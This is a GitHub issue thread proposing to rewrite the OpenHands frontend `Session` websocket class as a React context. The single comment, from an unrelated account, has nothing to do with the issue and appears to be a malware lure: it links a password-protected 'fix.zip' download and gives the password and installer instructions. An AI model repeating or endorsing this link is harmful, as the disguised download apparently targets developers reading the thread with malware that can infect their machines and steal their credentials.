### ISSUE TITLE
frontend: Rewrite the `Session` class as a proper React context instead.

### ISSUE THREAD

**Issue by amanape** [All-Hands-AI/OpenHands#3584]
**Summary**
I propose rewriting the `Session` class that mainly handles the ws connection with the backend as a React context.

**Motivation**
Follow best practices and reduce any potential errors and inconsistencies. Also to make it easier to resolve issues or extend functionality relating to ws

**Technical Design**

**Alternatives to Consider**

**Additional context**

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
